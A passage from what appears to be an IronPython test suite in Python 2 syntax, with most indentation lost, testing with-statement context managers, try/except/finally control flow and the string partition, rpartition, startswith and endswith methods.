with C() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
#enter raises
class D:
def __enter__(self):
raise RuntimeError("we force an error")
def __exit__(self, a,b,c): pass
try:
with D() as something: pass
except RuntimeError: pass
else :self.fail("Expected RuntimeError but found None")
#missing enter
class MissingEnter:
def __exit__(self,a,b,c): pass
try:
with MissingEnter(): pass
except AttributeError:pass
else: self.fail("Expected AttributeError but found None")
def test__exit__(self):
"""Testing __exit__"""
globals()["gblvar"] = 0
# more args
class E:
def __enter__(self): pass
def __exit__(self, a,b,c,d,e,f): pass
try:
with E() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
# less args
class F:
def __enter__(self): pass
def __exit__(self): pass
try:
with F() as something: pass
except TypeError: pass
else :self.fail("Expected TypeError but found None")
#exit raises
class H:
def __enter__(self): H.var1 = 100
def __exit__(self, a,b,c):
H.var2 = 200
raise RuntimeError("we force an error")
try:
with H():
H.var3 = 300
except RuntimeError: self.assertEqual((H.var1,H.var2,H.var3),(100,200,300))
else :self.fail("Expected RuntimeError but found None")
#exit raises on successful / throwing WITH
class Myerr1(Exception):pass
class Myerr2(Exception):pass
class Myerr3(Exception):pass
class ExitRaise:
def __enter__(self): H.var1 = 100
def __exit__(self, a,b,c):
if(a == None and b == None and c == None):
raise Myerr1
raise Myerr2
try:
with ExitRaise():
1+2+3
except Myerr1: pass
else :self.fail("Expected Myerr1 but found None")
try:
with ExitRaise():
raise Myerr3
except Myerr2: pass
else :self.fail("Expected Myerr2 but found None")
#exit propagates exception on name deletion ( covers FLOW CHECK scenario)
class PropagateException:
def __enter__(self): pass
def __exit__(self, a,b,c): return False
try:
with PropagateException() as PE:
del PE
print PE
except NameError:pass
else: self.fail("Expected NameError but found None")
try:
with PropagateException() as PE:
PE.var1 = 100
del PE
print PE
except AttributeError:pass
else: self.fail("Expected AttributeError but found None")
#exit consumes exception
class ConsumeException:
def __enter__(self): pass
def __exit__(self, a,b,c): return [1,2,3],{"dsad":"dsd"},"hello"
with ConsumeException():1/0
#missing exit
class MissingExit:
def __enter__(self): pass
try:
            with MissingExit(): pass
        except AttributeError: pass
else: self.fail("Expected AttributeError but found None")
#With Stmt under other compound statements (NO YIELD)
globals()["gblvar"] = 0
#inheritance
class cxtmgr:
def __exit__(self, a, b, c):
globals()["gblvar"] += 10
return False
class inherited_cxtmgr(cxtmgr):
def __enter__(self):
globals()["gblvar"] += 10
return False
# Building up most complex TRY-CATCH-FINALLY-RAISE-WITH-CLASS combination with inheritance.
#try->(try->(except->(with ->fun ->(try->(with->raise)->Finally(With)))))
try: #Try
try: #try->try
globals()["gblvar"] += 1
1/0
except ZeroDivisionError: #try->(try->except)
globals()["gblvar"] += 2
with inherited_cxtmgr() as ic: #try->(try->(except->with(inherited)))
globals()["gblvar"] += 3
def fun_in_with(): return "Python is smart"
self.assertEqual(fun_in_with(),"Python is smart") #try->(try->(except->(with ->fun)))
try: #try->(try->(except->(with ->fun ->try)))
globals()["gblvar"] += 4
with inherited_cxtmgr() as inherited_cxtmgr.var: #try->(try->(except->(with ->fun ->(try->with))))
globals()["gblvar"] += 5
raise Myerr1() #try->(try->(except->(with ->fun ->(try->with->raise))))
finally: #try->(try->(except->(with ->fun ->(try->(with->raise)->Finally))))
if not is_cli: #https://github.com/IronLanguages/main/issues/844
self.assertEqual(sys.exc_info()[0], Myerr1)
else:
self.assertEqual(sys.exc_info()[0], exceptions.ZeroDivisionError)
globals()["gblvar"] += 6
class ClassInFinally:
def __enter__(self):
globals()["gblvar"] += 7
return 200
def __exit__(self,a,b,c):
globals()["gblvar"] += 8
return False # it raises
with ClassInFinally(): #try->(try->(except->(with ->fun ->(try->(with->raise)->Finally(With)))))
globals()["gblvar"] += 9
except Myerr1: self.assertEqual(globals()["gblvar"],85)
# With in __enter__ and __exit__
globals()["gblvar"] = 0
class A:
def __enter__(self): globals()["gblvar"] += 1 ; return 100
def __exit__(self,a,b,c): globals()["gblvar"] += 2; return 200
class WithInEnterExit:
def __enter__(self):
with A() as b:
globals()["gblvar"] += 3;return A()
def __exit__(self,a,b,c):
with A() as c:
globals()["gblvar"] += 4; return A()
self.assertEqual(1,1)
with WithInEnterExit() as wie:
with wie as wie_wie:
globals()["gblvar"] += 100
self.assertEqual(globals()["gblvar"],116)
def test_thread_lock(self):
import thread
temp_lock = thread.allocate_lock()
self.assertTrue(hasattr(temp_lock, "__enter__"))
self.assertTrue(hasattr(temp_lock, "__exit__"))
self.assertTrue(not temp_lock.locked())
with temp_lock:
self.assertTrue(temp_lock.locked())
self.assertTrue(not temp_lock.locked())
with thread.allocate_lock(): pass
def test_with_file(self):
with file('abc.txt', 'w'):
pass
def test_try_catch_finally(self):
# test try-catch-finally syntax
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
#missing except,else
try:
setvar()
# missing else, finally
try:1 / 0
except ZeroDivisionError: setvar()
# missing else
try:
setvar()
a =[]
a[10]
except ZeroDivisionError: assert(False)
except IndexError: setvar()
finally: setvar()
finally:
setvar()
self.assertEqual(globals()["gblvar"],7)
globals()["gblvar"] = 1
class MyErr1(Exception) :pass
class MyErr2(Exception) :pass
class MyErr3(Exception) :pass
class MyErr4(Exception) :pass
def TestUnifiedTry(myraise1,myraise2, myraise3,myraise4,myraise5,myraise6,myraise7,myraise8,myraise9):
try:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise1 == "raiseInTry" :setvar(); raise MyErr1
if myraise1 == "outerTry" :setvar(); raise MyErr2
if myraise1 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise2 == "raiseInExcept": setvar(); raise MyErr2
if myraise2 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise2 == "raiseInElse": setvar(); raise MyErr2
if myraise2 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise3 == "raiseInFinally": setvar(); raise MyErr3
if myraise3 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
except MyErr2:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
except MyErr3:
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
else :
yield 1; setvar()
yield 2; setvar()
try:
setvar()
if myraise4 == "raiseInTry" :setvar(); raise MyErr1
if myraise4 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise5 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise6 == "Unhandled": setvar(); raise MyErr4
setvar()
yield 1; setvar()
yield 2; setvar()
finally :
#uncomment the following 2 lines once we have the fix for PS:1752
#and accordingly adjust the final expected result value
#yield 1; setvar()
#yield 2; setvar()
try:
setvar()
if myraise7 == "raiseInTry" :setvar(); raise MyErr1
setvar()
if myraise7 == "Unhandled" :setvar(); raise MyErr4
setvar()
except MyErr1:
setvar()
if myraise8 == "Unhandled": setvar(); raise MyErr4
setvar()
except :setvar() # should never be executed
else :
setvar()
if myraise8 == "Unhandled": setvar(); raise MyErr4
setvar()
finally :
setvar()
if myraise9 == "Unhandled": setvar(); raise MyErr4
setvar()
#uncomment the following 2 lines once we have the fix for PS:1752
#and accordingly adjust the final expected result value
#yield 1; setvar()
#yield 2; setvar()
myraise1 = ["raiseInTry","outerTry","Unhandled","None"]
myraise2 = ["raiseInExcept", "raiseInElse","Unhandled","None"]
myraise3 = ["raiseInFinally","Unhandled","None"]
myraise4 = ["raiseInTry","Unhandled","None"]
myraise5 = ["Unhandled","None"]
myraise6 = ["Unhandled","None"]
myraise7 = ["raiseInTry","Unhandled","None"]
myraise8 = ["Unhandled","None"]
myraise9 = ["Unhandled","None"]
def fun():
for a in myraise1:
for b in myraise2:
for c in myraise3:
for d in myraise4:
for e in myraise5:
for f in myraise6:
for g in myraise7:
for h in myraise8:
for i in myraise9:
k = TestUnifiedTry(a,b,c,d,e,f,g,h,i)
while(True):
try:
k.next()
except MyErr4: setvar();break
except StopIteration: setvar();break
fun()
self.assertEqual(globals()["gblvar"],141985)
def test_try_catch_finally_on_targets(self):
#test try-catch-finally on targets
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
def TestTargets(ret):
x = 0
y = 0
z = 0
setvar()
while( z < 6 ) :
z += 1
while( y < 8 ) :
y += 1
while( x < 20 ) :
x += 1
setvar()
try:
setvar()
if not x % 3 : setvar();continue
if not x % 4 : setvar();break
if not x % 5 : setvar();1 / 0
if not x % 7 and ret == "try" : setvar();return
setvar()
except:
setvar()
if not y % 3 : setvar();continue
if not y % 4 : setvar();break
if not y % 7 and ret == "except" : setvar();return
setvar()
else:
setvar()
if not x % 11 : setvar();continue
if not x % 13 : setvar();break
if not x % 19 and ret == "else" : setvar();return
setvar()
finally:
setvar()
                            #IronPython does support continue under finally; we skip it here only for CPython compatibility
#if z % 2 : setvar();continue
if not z % 2 : setvar();break
if not z % 5 and ret == "finally" : setvar();return
setvar()
setvar()
return
ret = ["try","except","else","finally"]
for r in ret:
TestTargets(r)
self.assertEqual(globals()["gblvar"],403)
def test_yield_in_finally(self):
"""test yield in finally"""
globals()["gblvar"] = 1
def setvar() : globals()["gblvar"] += 1
def test_yield_finally():
setvar()
try: setvar();1/0
except:setvar()
else: setvar()
finally:
setvar();yield 100
setvar();yield 100
setvar()
setvar()
try:
k = test_yield_finally()
while(1):
next(k)
except StopIteration: pass
self.assertEqual(globals()["gblvar"],8)
def test_string_partition(self):
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.partition('://'), ('http','://','www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'))
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.partition('stringnotpresent'), ('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython','',''))
self.assertEqual('stringisnotpresent'.partition('presentofcoursenot'), ('stringisnotpresent','',''))
self.assertEqual(''.partition('stringnotpresent'), ('','',''))
self.assertEqual('onlymatchingtext'.partition('onlymatchingtext'), ('','onlymatchingtext',''))
self.assertEqual('alotoftextherethatisapartofprefixonlyprefix_nosuffix'.partition('_nosuffix'), ('alotoftextherethatisapartofprefixonlyprefix','_nosuffix',''))
self.assertEqual('noprefix_alotoftextherethatisapartofsuffixonlysuffix'.partition('noprefix_'), ('','noprefix_','alotoftextherethatisapartofsuffixonlysuffix'))
self.assertEqual('\0'.partition('\0'), ('','\0',''))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\00\56\78'), ('\00\ff\67\56\d8\89\33\09\99\ee\20','\00\56\78','\45\77\e9'))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\78\45\77\e9'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56','\78\45\77\e9',''))
self.assertEqual('\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.partition('\ff\67\56\d8\89\33\09\99'), ('','\ff\67\56\d8\89\33\09\99','\ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.partition('random'), (u'\ff\67\56\d8\89\33\09\99some ','random',' 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.partition(u'\33\09\99some r'), (u'\ff\67\56\d8\89','\33\09\99some r','andom 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertRaises(ValueError,'sometextheretocauseanexeption'.partition,'')
self.assertRaises(ValueError,''.partition,'')
self.assertRaises(TypeError,'some\90text\ffhere\78to\88causeanexeption'.partition,None)
self.assertRaises(TypeError,''.partition,None)
prefix = """ this is some random text
and it has lots of text
"""
sep = """
that is multilined
and includes unicode \00 \56
\01 \02 \06 \12\33\67\33\ff \ee also"""
suffix = """
\78\ff\43\12\23ok"""
str = prefix + sep + suffix
self.assertEqual(str.partition(sep),(prefix,sep,suffix))
self.assertEqual(str.partition('nomatch'),(str,'',''))
self.assertRaises(TypeError,str.partition,None)
self.assertRaises(ValueError,str.partition,'')
def test_string_rpartition(self):
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?Project://Name=IronPython'.rpartition('://'), ('http://www.codeplex.com/WorkItem/List.aspx?Project','://','Name=IronPython'))
self.assertEqual('http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'.rpartition('stringnotpresent'), ('', '', 'http://www.codeplex.com/WorkItem/List.aspx?ProjectName=IronPython'))
self.assertEqual('stringisnotpresent'.rpartition('presentofcoursenot'), ('','', 'stringisnotpresent'))
self.assertEqual(''.rpartition('stringnotpresent'), ('','',''))
self.assertEqual('onlymatchingtext'.rpartition('onlymatchingtext'), ('','onlymatchingtext',''))
self.assertEqual('alotoftextherethatisapartofprefixonlyprefix_nosuffix'.rpartition('_nosuffix'), ('alotoftextherethatisapartofprefixonlyprefix','_nosuffix',''))
self.assertEqual('noprefix_alotoftextherethatisapartofsuffixonlysuffix'.rpartition('noprefix_'), ('','noprefix_','alotoftextherethatisapartofsuffixonlysuffix'))
self.assertEqual('\0'.partition('\0'), ('','\0',''))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\00\56\78\45\77\e9'.rpartition('\00\56\78'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78','\00\56\78','\45\77\e9'))
self.assertEqual('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9\78\45\77\e9'.rpartition('\78\45\77\e9'), ('\00\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9','\78\45\77\e9',''))
self.assertEqual('\ff\67\56\d8\89\33\09\99\ee\20\00\56\78\45\77\e9'.rpartition('\ff\67\56\d8\89\33\09\99'), ('','\ff\67\56\d8\89\33\09\99','\ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.rpartition('random'), (u'\ff\67\56\d8\89\33\09\99some ','random',' 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertEqual(u'\ff\67\56\d8\89\33\09\99some random 8-bit text here \ee\20\00\56\78\45\77\e9'.rpartition(u'\33\09\99some r'), (u'\ff\67\56\d8\89','\33\09\99some r','andom 8-bit text here \ee\20\00\56\78\45\77\e9'))
self.assertRaises(ValueError,'sometextheretocauseanexeption'.rpartition,'')
self.assertRaises(ValueError,''.rpartition,'')
self.assertRaises(TypeError,'some\90text\ffhere\78to\88causeanexeption'.rpartition,None)
self.assertRaises(TypeError,''.rpartition,None)
prefix = """ this is some random text
and it has lots of text
"""
sep = """
that is multilined
and includes unicode \00 \56
\01 \02 \06 \12\33\67\33\ff \ee also"""
suffix = """
\78\ff\43\12\23ok"""
str = prefix + sep + suffix
self.assertEqual(str.rpartition(sep),(prefix,sep,suffix))
self.assertEqual(str.rpartition('nomatch'),('','', str))
self.assertRaises(TypeError,str.rpartition,None)
self.assertRaises(ValueError,str.rpartition,'')
def test_string_startswith(self):
class A:pass
# failure scenarios
self.assertRaises(TypeError,'string'.startswith,None)
self.assertRaises(TypeError,'string'.startswith,(None,"strin","str"))
self.assertRaises(TypeError,'string'.startswith,(None,))
self.assertRaises(TypeError,'string'.startswith,(["this","is","invalid"],"str","stri"))
self.assertRaises(TypeError,'string'.startswith,(("string","this is invalid","this is also invalid",),))
self.assertRaises(TypeError,''.startswith,None)
self.assertRaises(TypeError,''.startswith,(None,"strin","str"))
self.assertRaises(TypeError,''.startswith,(None,))
self.assertRaises(TypeError,''.startswith,(["this","is","invalid"],"str","stri"))
self.assertRaises(TypeError,''.startswith,(("string","this is invalid","this is also invalid",),))
# success scenarios
self.assertEqual('no matching string'.startswith(("matching","string","here")),False)
self.assertEqual('here matching string'.startswith(("matching","string","here")), True)
self.assertEqual('here matching string'.startswith(("here", "matching","string","here")), True)
self.assertEqual('here matching string'.startswith(("matching","here","string",)), True)
self.assertEqual('here matching string'.startswith(("here matching string","here matching string","here matching string",)), True)
s = 'here \12 \34 \ff \e5 \45 matching string'
m = "here \12 \34 \ff \e5 \45 "
m1 = " \12 \34 \ff \e5 \45 "
n = "here \12 \34 \ff \e5 \46 "
n1 = " \12 \34 \ff \e5 \46 "
self.assertEqual(s.startswith((m,None)), True)
self.assertEqual(s.startswith((m,123, ["here","good"])), True)
self.assertEqual(s.startswith(("nomatch",m,123, ["here","good"])), True)
# with start parameter = 0
self.assertEqual(s.startswith((m,None),0), True)
self.assertEqual(s.startswith((n,"nomatch"),0), False)
self.assertEqual(s.startswith((s,"nomatch"),0), True)
self.assertEqual(s.startswith((s + "a","nomatch"),0), False)
self.assertRaises(TypeError, s.startswith,(n,None),0)
self.assertRaises(TypeError, s.startswith,(None, n),0)
self.assertRaises(TypeError, s.startswith,(A, None, m),0)
# with start parameter > 0
self.assertEqual(s.startswith((m1,None),4), True)
self.assertEqual(s.startswith((m,"nomatch"),4), False)
self.assertEqual(s.startswith((n1,"nomatch"),4), False)
self.assertEqual(s.startswith((" \12 \34 \fd \e5 \45 ","nomatch"),4), False)
self.assertEqual(s.startswith((s," \12 \34 \ff \e5 \45 matching string"),4), True)
self.assertEqual(s.startswith((" \12 \34 \ff \e5 \45 matching string" + "a","nomatch"),4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4)
self.assertRaises(TypeError, s.startswith,(None, n1),4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4)
self.assertEqual(s.startswith(("g",None),len(s) - 1), True)
self.assertEqual(s.startswith(("g","nomatch"),len(s)), False)
self.assertEqual(s.startswith(("g","nomatch"),len(s) + 400), False)
# with start parameter < 0
self.assertEqual(s.startswith(("string",None),-6), True)
self.assertEqual(s.startswith(("stro","nomatch"),-6), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6), False)
self.assertEqual(s.startswith(("stringandmore","nomatch"),-6), False)
self.assertEqual(s.startswith(("prefixandstring","nomatch"),-6), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6)
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6)
self.assertEqual(s.startswith(("here",None),-len(s)), True)
self.assertEqual(s.startswith((s,None),-len(s) - 1 ), True)
self.assertEqual(s.startswith(("here",None),-len(s) - 400), True)
# with start and end parameters
# with +ve start , +ve end
# end > start
self.assertEqual(s.startswith((m1,None),4,len(s)), True)
self.assertEqual(s.startswith((m1,None),4,len(s) + 100), True)
self.assertEqual(s.startswith((n1,"nomatch"),len(s)), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, len(s))
self.assertRaises(TypeError, s.startswith,(None, n1),4 , len(s) + 100)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, len(s))
# end < start
self.assertRaises(TypeError, s.startswith, (m1,None),4,3)
self.assertRaises(TypeError, s.startswith, (m1,None),4,2)
self.assertRaises(TypeError, s.startswith, (n1,None),4, 3)
self.assertRaises(TypeError, s.startswith, (None, n1),4 , 3)
self.assertRaises(TypeError, s.startswith, (A, None, m1),4, 0)
# end == start
self.assertEqual(s.startswith(("",None),4,4), True)
self.assertEqual(s.startswith((m1,),4,4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, 4)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , 4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, 4)
# with -ve start , +ve end
# end > start
self.assertEqual(s.startswith(("string",None),-6, len(s)), True)
self.assertEqual(s.startswith(("string",None),-6, len(s) + 100), True)
self.assertEqual(s.startswith(("string","nomatch"),-6, len(s) -2), False)
self.assertEqual(s.startswith(("stro","nomatch"),-6, len(s)-1), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,len(s)), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6,len(s) + 3)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6, len(s))
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6,len(s))
self.assertEqual(s.startswith(("here",None),-len(s), 5), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), 2), False)
self.assertEqual(s.startswith(("here",None),-len(s) - 1, 4 ), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, 2 ), False)
# end < start
self.assertRaises(TypeError, s.startswith, ("string",None),-6, 10)
self.assertRaises(TypeError, s.startswith, ("string000",None),-6,10)
self.assertRaises(TypeError, s.startswith, (None, "string"),-6, 10)
self.assertRaises(TypeError, s.startswith, (A, None, "string"),-6,10)
self.assertEqual(s.startswith(("stro","nomatch"),-6, 10), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,10), False)
# end == start
self.assertRaises(TypeError,s.startswith, ("string",None),-6, len(s) -6)
self.assertEqual(s.startswith(("",None),-6, len(s) -6), True)
# with +ve start , -ve end
# end > start
self.assertEqual(s.startswith((m1,None),4,-5 ), True)
self.assertEqual(s.startswith((m1,"nomatch"),4,-(4 + len(m) +1) ), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, -5)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , -5)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, -5)
# end < start
self.assertRaises(TypeError, s.startswith, (m1,None),4,-len(s) + 1)
self.assertRaises(TypeError, s.startswith, (n1,None),4, -len(s))
self.assertRaises(TypeError, s.startswith, (None, n1),4 , -len(s))
self.assertRaises(TypeError, s.startswith, (A, None, m1),4, -len(s))
self.assertEqual(s.startswith((m1,),4,-len(s) + 1), False)
self.assertEqual(s.startswith((m1,),4,-500), False)
# end == start
self.assertEqual(s.startswith(("",None),4,-len(s) + 4), True)
self.assertEqual(s.startswith((m1,"nomatch"),4,-len(s) + 4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, -len(s) + 4)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , -len(s) + 4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, -len(s) + 4)
# with -ve start , -ve end
# end > start
self.assertEqual(s.startswith(("stri",None),-6, -2), True)
self.assertEqual(s.startswith(("string","nomatch"),-6, -1), False)
self.assertEqual(s.startswith(("stro","nomatch"),-6, -1), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,-1), False)
self.assertEqual(s.startswith(("stringand","nomatch"),-6,-1), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6, -1)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6, -1)
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6,-1)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), -5), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), -len(s) + 2), False)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, -5 ), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, -len(s) + 2), False)
# end < start
self.assertRaises(TypeError, s.startswith, ("string",None),-6, -7)
self.assertRaises(TypeError, s.startswith, ("string000",None),-6,-8)
self.assertRaises(TypeError, s.startswith, (None, "string"),-6, -8)
self.assertRaises(TypeError, s.startswith, (A, None, "string"),-6,-8)
self.assertEqual(s.startswith(("stro","nomatch"),-6, -8), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,-8), False)
# end == start
self.assertEqual(s.startswith(("string","nomatch"),-6, -6), False)
self.assertEqual(s.startswith(("",None),-6, -6), True)
def test_string_endswith(self):
        #failure scenarios
class A:pass
self.assertRaises(TypeError,'string'.endswith,None)
self.assertRaises(TypeError,'string'.endswith,(None,"tring","ing"))
self.assertRaises(TypeError,'string'.endswith,(None,))
self.assertRaises(TypeError,'string'.endswith,(["this","is","invalid"],"ring","ing"))
self.assertRaises(TypeError,'string'.endswith,(("string","this is invalid","this is also invalid",),))
self.assertRaises(TypeError,''.endswith,None)
self.assertRaises(TypeError,''.endswith,(None,"tring","ring"))
self.assertRaises(TypeError,''.endswith,(None,))
self.assertRaises(TypeError,''.endswith,(["this","is","invalid"],"tring","ring"))
self.assertRaises(TypeError,''.endswith,(("string","this is invalid","this is also invalid",),))
#Positive scenarios
self.assertEqual('no matching string'.endswith(("matching","no","here")),False)
self.assertEqual('here matching string'.endswith(("string", "matching","nomatch")), True)
self.assertEqual('here matching string'.endswith(("string", "matching","here","string")), True)
self.assertEqual('here matching string'.endswith(("matching","here","string",)), True)
self.assertEqual('here matching string'.endswith(("here matching string","here matching string","here matching string",)), True)
s = 'here \12 \34 \ff \e5 \45 matching string'
m = "\e5 \45 matching string"
m1 = "\e5 \45 matching "
n = "\e5 \45 matching strinh"
n1 = "\e5 \45 matching_"
self.assertEqual(s.endswith((m,None)), True)
self.assertEqual(s.endswith((m,123, ["string","good"])), True)
self.assertEqual(s.endswith(("nomatch",m,123, ["here","string"])), True)
        #With start parameter = 0
self.assertEqual(s.endswith((m,None),0), True)
self.assertEqual(s.endswith((n,"nomatch"),0), False)
self.assertEqual(s.endswith((s,"nomatch"),0), True)
self.assertEqual(s.endswith((s + "a","nomatch"),0), False)
self.assertRaises(TypeError, s.endswith,(n,None),0)
self.assertRaises(TypeError, s.endswith,(None, n),0)
self.assertRaises(TypeError, s.endswith,(A, None, m),0)
        #With start parameter > 0
self.assertEqual(s.endswith((m,None),4), True)
self.assertEqual(s.endswith((m,"nomatch"),4), True)
self.assertEqual(s.endswith((n1,"nomatch"),4), False)
self.assertEqual(s.endswith((" \12 \34 \fd \e5 \45 ","nomatch"),4), False)
self.assertEqual(s.endswith((s," \12 \34 \ff \e5 \45 matching string"),4), True)
self.assertEqual(s.endswith((" \12 \34 \ff \e5 \45 matching string" + "a","nomatch"),4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4)
self.assertRaises(TypeError, s.endswith,(None, n1),4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4)
self.assertEqual(s.endswith(("g",None),len(s) - 1), True)
self.assertEqual(s.endswith(("g","nomatch"),len(s)), False)
self.assertEqual(s.endswith(("g","nomatch"),len(s) + 400), False)
        #With start parameter < 0
self.assertEqual(s.endswith(("string",None),-6), True)
self.assertEqual(s.endswith(("ring",None),-6), True)
self.assertEqual(s.endswith(("rong","nomatch"),-6), False)
self.assertEqual(s.endswith(("strong","nomatch"),-6), False)
self.assertEqual(s.endswith(("stringandmore","nomatch"),-6), False)
self.assertEqual(s.endswith(("prefixandstring","nomatch"),-6), False)
self.assertRaises(TypeError, s.endswith,("string000",None),-6)
self.assertRaises(TypeError, s.endswith,(None, "string"),-6)
self.assertRaises(TypeError, s.endswith,(A, None, "string"),-6)
self.assertEqual(s.endswith(("string",None),-len(s)), True)
self.assertEqual(s.endswith((s,None),-len(s) - 1 ), True)
self.assertEqual(s.endswith(("string",None),-len(s) - 400), True)
        #With start and end parameters
# with +ve start , +ve end
# end > start
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s)), False)
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s) - 6), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s) - 8), False)
self.assertEqual(s.endswith((n1,"nomatch"),4,len(s) - 6), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, len(s)-6)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , len(s)-6)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, len(s)-6)
# end < start
self.assertRaises(TypeError, s.endswith, (m1,None),4,3)
self.assertRaises(TypeError, s.endswith, (n1,None),4, 3)
self.assertRaises(TypeError, s.endswith, (None, n1),4 , 3)
self.assertRaises(TypeError, s.endswith, (A, None, m1),4, 0)
# end == start
self.assertEqual(s.endswith(("",None),4,4), True)
self.assertEqual(s.endswith((m1,),4,4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, 4)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , 4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, 4)
# with -ve start , +ve end
# end > start
self.assertEqual(s.endswith((m1,None),-30, len(s) -6), True)
self.assertEqual(s.endswith((m1,None),-300, len(s) -6 ), True)
self.assertEqual(s.endswith((m1,"nomatch"),-5, len(s) -6), False)
self.assertEqual(s.endswith(("string",None),-30, len(s) + 6), True)
self.assertEqual(s.endswith(("string",None),-300, len(s) + 6 ), True)
self.assertEqual(s.endswith(("here",None),-len(s), 4), True)
self.assertEqual(s.endswith(("here",None),-300, 4 ), True)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s), 4), False)
self.assertEqual(s.endswith(("hera","nomatch"),-300, 4 ), False)
self.assertRaises(TypeError, s.endswith,("here000",None),-len(s),4)
self.assertRaises(TypeError, s.endswith,(None, "here"),-len(s),4)
self.assertRaises(TypeError, s.endswith,(A, None, "here"),-len(s),4)
# end < start
